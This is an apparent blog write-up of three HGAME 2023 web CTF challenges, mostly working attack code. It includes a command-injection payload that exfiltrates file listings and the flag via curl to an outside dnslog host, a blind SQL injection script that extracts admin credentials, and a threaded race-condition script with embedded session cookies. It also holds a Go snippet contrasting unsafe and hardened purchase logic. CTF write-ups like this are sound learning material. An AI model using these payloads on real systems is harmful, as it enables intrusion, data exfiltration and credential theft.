HGAME_2023_WEB_WP_WEEK3

Source: 博客园 (cnblogs)


Ping to the host

An obvious RCE. A quick test shows that spaces, cat and ; are blocked, and the command runs with no output echoed back. Spaces can be bypassed with ${IFS}, %09, $IFS$9 and so on; to get the execution result out we exfiltrate it over dnslog, here using http://ceye.io/

Since each dnslog callback can only carry one piece of information, we use sed -n to enumerate the remaining entries one line at a time:

ip=|curl${IFS}http://?????.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}"1p"`

This gives the flag file name: flag_is_here_haha

The string flag is blocked as well, so read the file through a wildcard instead:

ip=|curl${IFS}http://?????.ceye.io/`ca""t%09/fla*`

Login To Get My Gift

A simple SQL injection: recovering the admin account's password yields the flag. The exploit is given directly here:

import requests

flag = ""


def attack_post(url):
    # Boolean-based blind injection: binary-search the ASCII value of each
    # character of the target string, using "Success!" in the response as
    # the oracle. The four payloads are the successive stages (database
    # name, table names, column names, credentials); payload3 is the one
    # actually sent.
    global flag
    r = requests.session()
    for i in range(1, 100000):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            payload = f'a"/**/||/**/((ascii(right(left(database(),{i}),1)))<{mid})#'
            payload1 = f'a"/**/||/**/((ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/database()),{i}),1)))<{mid})#'
            payload2 = f'a"/**/||/**/((ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/"User1nf0mAt1on"),{i}),1)))<{mid})#'
            payload3 = f'a"/**/||/**/((ascii(right(left((select/**/group_concat(concat_ws(":",UsErN4me,PAssw0rD))/**/from/**/User1nf0mAt1on),{i}),1)))<{mid})#'
            # print(payload)
            data = {
                "username": "testuser",
                "password": payload3
            }
            rp = r.post(url, data=data)
            # print(rp.text)
            if "Success!" in rp.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        # Stop once the search range degenerates (end of the string)
        if low <= 32 or high >= 127:
            break
        flag += chr(mid - 1)
        print(flag)


if __name__ == "__main__":
    url = "http://week-3.hgame.lwsec.cn:30369/login"
    attack_post(url)

Gopher Shop

The attachment is the source code. First take a look at the challenge environment: it is a shop interface selling a few items, one of which is FLAG, so clearly we need to buy that FLAG. Then analyse the source and find user.go, which implements the selling functionality. Further down is the function that decides whether an item can be sold: after the if check it directly adds to or subtracts from the product quantity. We guessed a race condition here, getting past the if and buying the FLAG outright. The intended solution should actually be a Go uint overflow, so this counts as an unintended solution.

import requests
import threading

headers = {
    "Cookie": "SESSION=MTY3NDU1MjI0MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXw23LorOFg5LmryZzZcxm8ESbYpNFaTv1UjY2UkMozyJw==; session=MTY3NDcwNzYyM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fM5a-9HM-2vbFCrfAbfLVU049emtbxCloYDTab3QDEx-"
}


def get(url):
    r = requests.get(url=url, headers=headers)


if __name__ == "__main__":
    url = "http://week-3.hgame.lwsec.cn:30552/api/v1/user/buyProduct?product=Flag&number=1"
    # Fire many concurrent requests so several pass the if check before
    # any of them updates the quantity
    for i in range(100000):
        threading.Thread(target=get, args=(url,)).start()

After that the FLAG is simply bought from the interface, and checkFLAG returns the flag value:

hgame{GopherShop_M@gic_1nt_0verflow}
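As an added illustration of the bug class the writeup attributes to user.go (this is not the challenge's code; the Shop type, its fields and the price are assumptions), a Go model of the unsafe check-then-update beside a hardened version that holds a lock across the critical section and rejects any quantity whose cost would overflow:

```go
package main

import (
	"errors"
	"fmt"
	"math"
	"sync"
)

// Shop is an assumed model of the user.go pattern described above (not the challenge's code).
type Shop struct {
	mu      sync.Mutex
	Balance uint64 // user's money
	Owned   uint64 // units bought
	Price   uint64 // price per unit
}

// BuyUnsafe has both defects: Price*number wraps silently on overflow, and the
// check and update are not atomic, so concurrent requests can all pass the if.
func (s *Shop) BuyUnsafe(number uint64) error {
	cost := s.Price * number
	if cost > s.Balance {
		return errors.New("insufficient balance")
	}
	s.Balance -= cost
	s.Owned += number
	return nil
}

// BuySafe holds the lock across check-and-update and rejects a quantity whose
// cost would overflow before performing the multiplication.
func (s *Shop) BuySafe(number uint64) error {
	s.mu.Lock()
	defer s.mu.Unlock()
	if number == 0 || s.Price == 0 || number > math.MaxUint64/s.Price {
		return errors.New("invalid or overflowing quantity")
	}
	if cost := s.Price * number; cost <= s.Balance {
		s.Balance -= cost
		s.Owned += number
		return nil
	}
	return errors.New("insufficient balance")
}

func main() {
	huge := uint64(1) << 54 // 1024 * 2^54 == 2^64, which wraps to 0
	u, h := &Shop{Balance: 500, Price: 1024}, &Shop{Balance: 500, Price: 1024}
	fmt.Println(u.BuyUnsafe(huge), u.Balance, h.BuySafe(huge)) // <nil> 500 invalid or overflowing quantity
}
```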